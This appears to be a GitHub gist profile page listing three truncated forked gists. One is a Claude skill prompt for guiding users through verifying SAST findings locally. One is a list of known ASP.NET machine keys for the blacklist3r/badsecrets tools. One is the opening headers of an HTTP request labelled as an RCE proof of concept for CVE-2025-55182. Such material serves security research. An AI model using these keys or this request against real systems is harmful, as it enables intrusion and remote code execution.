๐๐ช๐ป๐ฎ๐ผ๐ฑ ๐ข๐ฒ๐ท๐ฐ๐ฑ hunter-0x7
hunter-0x7
/ vuln-verify.skill
Created
May 15, 2026 05:42
— forked from InsiderPhD/vuln-verify.skill
A skill for manually verifying SAST findings using Burp/CAIDO
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- | |
| name: vuln-verify | |
| description: Guide the user through manually verifying a security finding (CVE, SAST result, bug report) against a live local instance of a target application. Use this skill whenever the user provides a GitHub repo URL plus a vulnerability finding and wants to confirm exploitability โ even if they say "just check this", "is this real?", "can you verify?", "test this finding", "does this actually work?", or "PoC this". Also triggers when the user pastes a finding with source/sink/trace details and asks any question about its validity. The skill is opinionated: it skips re-summarizing static analysis and instead tells the user exactly what to do and what to look for. The USER does the testing. Claude provides the instructions and sets up Docker automatically. | |
| --- | |
| # Vulnerability Verification | |
| ## Your role | |
| You are a guide. You set up the environment. The user does the testing. |
hunter-0x7
/ aspnet_machinekeys.txt
Created
April 3, 2026 09:26
— forked from 0xdsm/aspnet_machinekeys.txt
Better aspnet_machinekeys.txt for blacklist3r.py (/badsecrets/badsecrets/resources/aspnet_machinekeys.txt)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0007EDC7D387A1C86422F769DDF45DE4C2FEEDBE21460EACD2F64D2B749A4159A497B6EF0B08252CB24C09DA993DA6F3524CE73B945BA531EB3C7DD4FFC0DFBB,4FCA412AF185EBF793CF3E79E1AF7098E1C3CEACD6B4C43B10252B69174A3217 | |
| 00428FF15305A21896B63F9C9F83F0495D39E2E835E233CCA8AF690C8D8AFC475B92C982340010280E1EDD07BFB7ADC40B8C82B0AD2972E3FFD0ECA97A5D98E3,F8FD040DE95A6BB9F5A23AE4439761C4BBF65E39E0CFD2A3 | |
| 004E8483C6E007C8CED7DB6908721B41D8CCFC4E0D5CF0B462EE9905B3B1575248FD017CA159985EA859A1FE4BD100DFC1A5615C3EAAE7F1D4E9507B747B751B,02F509E61567C6E1A7E39E313CF49B8ACBD6C0420B2D64B66C44F1C43E2D1B71 | |
| 004EE2BD151447E64E7273DCE070EE34E55507E0243F7A044A2F4E81ED5D65653DE63E483FABAB206E96116004F22DDA817ACAD836887685370B8EA20E707B70,69EFDD5E7C83C5DAEA87DC6B17207496D4412E719FCE08EF690C42A8980C84B5 | |
| 00575EFEE86BAB31F844C82EB42BE8CEB6C50F737A2A0FD78B62402ECEB3B120,F2D0D509462E61125BA4D46C6E26B5F8B9B4783A36800313B1930D261D17A416 | |
| 0074D9E5776602E629B362073918A43AD0D631800111D0453DB3416D3827C95B81F575B388A6B425E39AC49BCDC2DC8A57AD2207DC726E78544525A83AB4FE08,245ED |
hunter-0x7
/ CVE-2025-55182.http
Created
December 7, 2025 23:00
— forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |